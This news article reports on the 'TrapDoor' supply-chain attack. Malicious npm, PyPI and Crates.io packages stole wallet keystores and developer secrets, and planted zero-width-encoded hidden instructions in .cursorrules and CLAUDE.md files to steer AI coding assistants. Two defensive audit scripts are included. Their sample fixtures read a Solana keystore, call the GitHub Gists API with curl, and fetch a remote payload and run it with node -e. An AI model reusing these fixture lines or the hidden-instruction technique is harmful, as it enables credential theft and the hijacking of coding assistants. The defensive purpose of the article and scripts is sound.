Researchers Detail 'TrapDoor' Supply‑Chain Attack That Hid Malicious Instructions in AI Assistant Files
Security researchers say a cross-registry software supply-chain attack dubbed TrapDoor used malicious developer-tool packages on npm, PyPI and Crates.io to target cryptocurrency wallet data and developer credentials, with an unusual twist: it also planted hidden instructions in AI coding-assistant configuration files. The findings point to a broad developer-tooling compromise with crypto implications, not a confirmed theft case.
Socket Security published a technical report on May 24, and the Cloud Security Alliance and its CSAI Foundation followed with a research note on May 26. Researchers said the campaign was publicly visible by May 22, when a PyPI package version was uploaded at 20:20:18 UTC. Across the three registries, they said the operation involved dozens of malicious package names and more than 384 published artifacts or versions. In Socket's words, "TrapDoor crypto stealer hits 36 malicious packages across npm, PyPI, and Crates.io, targeting crypto, DeFi, AI, and security developers."
According to the research, TrapDoor targeted crypto, decentralized finance and AI developers, specifically seeking wallet keystores and related data for Solana, Sui and Aptos. It also sought a wider set of developer secrets, including SSH keys, Amazon Web Services credentials, GitHub tokens, browser profile and login data, environment variables, API keys and local developer configuration files. That matters because a malicious package can compromise a developer laptop or a CI/CD system (the automated pipeline that builds and deploys software) and expose repository, cloud or wallet credentials to everything downstream of that pipeline.
The delivery method varied by ecosystem. On npm, the packages used postinstall hooks, which run automatically after installation, to launch a shared JavaScript payload called trap-core.js. On PyPI, the malicious code ran when the package was imported: it fetched a remote JavaScript payload from an attacker-controlled GitHub Pages site and executed it through node -e. On Crates.io, malicious build.rs scripts ran during cargo build, searched for local keystores, encrypted them and exfiltrated them; researchers said they observed exfiltration to GitHub Gists. In each case the code ran before the developer had any reason to read it: installing, importing or compiling the package was enough. Socket and CSA also linked the campaign to attacker-controlled GitHub infrastructure, including an account and GitHub Pages site used to host payloads and configuration.
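The three triggers described above (npm lifecycle scripts, Python import-time code and Rust build scripts) can all be inspected before a package is allowed to run. The following pre-install audit is an added example written for this article, not code from Socket, CSA or the TrapDoor packages: it walks a downloaded package directory, lists what would execute automatically in each ecosystem, and greps that code for the behaviours the reporting describes (fetching from a github.io host, piping into node -e, touching GitHub Gists, reading wallet keystores). The indicator patterns, the default keystore paths and the sample packages are this example's own constructions, not signatures taken from the reports.

```python
"""Pre-install audit: list code that runs on its own at install, import or build time."""
import json
import re
import tempfile
from pathlib import Path

# npm scripts that `npm install` runs with no further user action.
NPM_AUTO_SCRIPTS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators chosen for this example (not TrapDoor signatures).
INDICATORS = {
    "github_pages_url": re.compile(r"https?://[\w.-]+\.github\.io\b"),
    "github_gist_api": re.compile(r"api\.github\.com/gists"),
    "node_eval": re.compile(r"\bnode\b[^\n]*?[\"'\s]-e\b"),
    "network_fetch": re.compile(r"\b(urlopen|requests\.(?:get|post)|fetch|curl|wget|reqwest)\b"),
    "dynamic_exec": re.compile(r"\b(exec|eval|subprocess|child_process|Command::new)\b"),
    # Assumed default CLI key locations for the chains named in the reporting.
    "wallet_keystore": re.compile(r"\.config/solana|\.sui/|\.aptos/"),
}


def match_indicators(text: str):
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_file(path: Path):
    return match_indicators(path.read_text(encoding="utf-8", errors="replace"))


def audit_npm(pkg: Path):
    """Report every automatic lifecycle script, following `node <file>` one level down."""
    manifest = pkg / "package.json"
    if not manifest.exists():
        return []
    scripts = json.loads(manifest.read_text(encoding="utf-8")).get("scripts", {})
    findings = []
    for hook in NPM_AUTO_SCRIPTS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        indicators = set(match_indicators(cmd))
        m = re.search(r"\bnode\s+(\S+\.c?js)\b", cmd)
        if m and (pkg / m.group(1)).exists():
            indicators |= set(scan_file(pkg / m.group(1)))
        findings.append({"ecosystem": "npm", "trigger": f"scripts.{hook}",
                         "command": cmd, "indicators": sorted(indicators)})
    return findings


def audit_python(pkg: Path):
    """setup.py runs at install time and __init__.py on first import; read both first."""
    findings = []
    for path in list(pkg.glob("setup.py")) + list(pkg.rglob("__init__.py")):
        indicators = scan_file(path)
        if indicators:
            findings.append({"ecosystem": "pypi", "trigger": path.relative_to(pkg).as_posix(),
                             "indicators": indicators})
    return findings


def audit_cargo(pkg: Path):
    """A build script is compiled and executed on the developer's machine by `cargo build`."""
    toml = pkg / "Cargo.toml"
    if not toml.exists():
        return []
    m = re.search(r'^\s*build\s*=\s*"([^"]+)"', toml.read_text(encoding="utf-8"), re.M)
    build_rs = pkg / (m.group(1) if m else "build.rs")
    if not build_rs.exists():
        return []
    return [{"ecosystem": "crates.io", "trigger": build_rs.name, "indicators": scan_file(build_rs)}]


def audit_package(pkg: Path):
    return audit_npm(pkg) + audit_python(pkg) + audit_cargo(pkg)


def build_samples(root: Path):
    """Constructed sample packages for this example; none of this is real TrapDoor code."""
    npm = root / "npm-pkg"; npm.mkdir()
    (npm / "package.json").write_text(json.dumps({"name": "sample-sdk", "version": "1.0.0",
        "scripts": {"postinstall": "node install-helper.js", "test": "jest"}}), encoding="utf-8")
    (npm / "install-helper.js").write_text(
        'const fs = require("fs"); const h = require("os").homedir();\n'
        'fs.readFileSync(h + "/.config/solana/id.json");\n'
        'require("child_process").execSync("curl -s https://api.github.com/gists");\n', encoding="utf-8")
    py = root / "py-pkg" / "sample_sdk"; py.mkdir(parents=True)
    (py / "__init__.py").write_text(
        'import subprocess\nfrom urllib.request import urlopen\n'
        'code = urlopen("https://example-pages.github.io/p.js").read().decode()\n'
        'subprocess.run(["node", "-e", code])\n', encoding="utf-8")
    rs = root / "rs-pkg"; rs.mkdir()
    (rs / "Cargo.toml").write_text('[package]\nname = "sample"\nversion = "0.1.0"\n', encoding="utf-8")
    (rs / "build.rs").write_text('fn main() { let home = std::env::var("HOME").unwrap();\n'
        '  let _ = std::fs::read_dir(format!("{home}/.sui/")); }\n', encoding="utf-8")
    clean = root / "clean-pkg"; clean.mkdir()
    (clean / "package.json").write_text(json.dumps({"name": "clean", "scripts": {"test": "jest"}}), encoding="utf-8")


def run_demo():
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_samples(root)
        return {p.name: audit_package(p) for p in sorted(root.iterdir())}


if __name__ == "__main__":
    for name, findings in run_demo().items():
        print(name, "->", findings or "no automatic code paths flagged")
```

The audit is a reading aid, not a verdict: a hit on `network_fetch` in a postinstall script is a reason to open the file, and an empty result only means none of these particular strings appeared. For npm specifically, `npm install --ignore-scripts` (a real npm option, mentioned here as the author's recommendation) stops the postinstall vector outright, but it does nothing for Python code that runs on import or a Rust build.rs that runs on compile, which is why the check covers all three.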
What most distinguished TrapDoor, researchers said, was its use of AI assistant configuration files as a persistence and exfiltration surface. The malware planted .cursorrules and CLAUDE.md files containing hidden instructions encoded with zero-width Unicode characters, such as U+200B, U+200C, U+200D and U+FEFF: characters that render as nothing on screen but are read by software, including the coding assistant that consumes those files as project instructions. The CSA research note was titled "TrapDoor: Supply Chain Attack — Poisons AI Coding Assistants" and described the method as a notable new vector involving AI assistants, and the first documented operational use of the technique at this scale.
The broader risk is that packages that are malicious by design can slip past standard vulnerability and software composition analysis scanners, which match installed versions against databases of known flaws rather than examining what a package does; a package with no published CVE passes clean. That makes behavioral analysis or pre-install scanning more important in cases like this. Some of the malicious packages had already been removed by the time Socket published its report, while others were still live at that time; the public reporting reviewed does not give a definitive current count. As of May 29, there were no publicly confirmed on-chain wallet drains or quantified stolen funds tied to TrapDoor.
Researchers said anyone who installed affected packages should audit project directories for unexpected .cursorrules and CLAUDE.md files, scan those files for hidden zero-width characters and treat the machine as potentially compromised even if there is no obvious sign of exfiltration. They also recommended rotating exposed SSH keys, AWS keys, GitHub tokens and wallet credentials or keystores. Because the instruction files are ordinary text, a file that looks empty or innocuous in an editor can still carry a payload; the check has to be done on the code points, not by eye.
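The audit step above is easy to get wrong by eye, since the characters in question do not render. The script below is an added example written for this article (not tooling from Socket, CSA or any project the article names) that walks a tree, reports every .cursorrules and CLAUDE.md file it finds, and counts the zero-width code points in each. Two caveats a practitioner would want are built in: a single U+FEFF at the very start of a file is an ordinary UTF-8 byte-order mark and is not counted, and U+200D occurs legitimately inside emoji sequences, so isolated hits are marked for review while long runs (a threshold chosen for this example; the reporting does not describe TrapDoor's encoding) are marked suspicious. The inclusion of U+2060 and the sample files are this example's own constructions.

```python
"""Audit a project tree for AI-assistant instruction files carrying zero-width characters."""
import tempfile
from pathlib import Path

# Code points named in the reporting, plus U+2060 WORD JOINER (added in this example).
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}

# File names the reporting says TrapDoor planted; extend for your own assistant tooling.
TARGET_NAMES = {".cursorrules", "CLAUDE.md"}

# Assumption of this example: a run this long reads as an encoded payload rather than
# stray formatting (emoji joiners and a lone BOM never come in runs like this).
RUN_THRESHOLD = 8


def find_hidden_chars(text: str):
    """Return (hits, longest_run) where hits is [(line, column, 'U+XXXX'), ...].

    A U+FEFF at line 1, column 1 is the UTF-8 byte-order mark and is skipped; every other
    zero-width character is reported so a reviewer can judge it in context.
    """
    hits, longest, current = [], 0, 0
    for lineno, line in enumerate(text.splitlines(), start=1):
        current = 0  # runs do not span lines
        for col, ch in enumerate(line, start=1):
            if ch not in ZERO_WIDTH or (lineno == 1 and col == 1 and ch == "\ufeff"):
                current = 0
                continue
            hits.append((lineno, col, f"U+{ord(ch):04X}"))
            current += 1
            longest = max(longest, current)
    return hits, longest


def classify(hits, longest_run):
    if not hits:
        return "clean"
    return "suspicious" if longest_run >= RUN_THRESHOLD else "review"


def audit_tree(root: Path):
    """Report every target file, clean or not: an unexpected .cursorrules or CLAUDE.md
    is itself a finding even before its contents are examined."""
    report = {}
    for path in root.rglob("*"):
        if path.name in TARGET_NAMES and path.is_file():
            hits, longest = find_hidden_chars(path.read_text(encoding="utf-8", errors="replace"))
            report[path.relative_to(root).as_posix()] = {
                "verdict": classify(hits, longest),
                "hidden_chars": len(hits),
                "longest_run": longest,
                "first_hits": hits[:3],
            }
    return report


def build_sample_tree(root: Path):
    """Constructed sample files for this example, not real TrapDoor artifacts."""
    (root / "CLAUDE.md").write_text("# Project notes\nUse pytest for tests.\n", encoding="utf-8")
    (root / "packages" / "sdk").mkdir(parents=True)
    # Sixteen zero-width characters spliced onto an innocuous rule line stand in for an
    # encoded instruction block (the real encoding is not described in the public reports).
    hidden = "\u200b\u200c\u200d\u200b" * 4
    (root / "packages" / "sdk" / ".cursorrules").write_text(
        "Always run the helper script before committing." + hidden + "\n", encoding="utf-8")
    (root / "docs").mkdir()
    # Leading BOM plus a family emoji built with two U+200D joiners: benign, but worth a look.
    (root / "docs" / "CLAUDE.md").write_text(
        "\ufeffTeam: \U0001F468\u200d\U0001F469\u200d\U0001F467\n", encoding="utf-8")


def run_demo():
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return audit_tree(root)


if __name__ == "__main__":
    for rel, info in sorted(run_demo().items()):
        print(f"{info['verdict']:10} {rel}  hidden={info['hidden_chars']} "
              f"longest_run={info['longest_run']} first={info['first_hits']}")
```

Run it from the root of each checkout that pulled the affected packages; anything marked suspicious, and any target file the team did not create, should be treated as the researchers advise, that is, as evidence the machine and its credentials need the full rotation described above rather than as a file to simply delete.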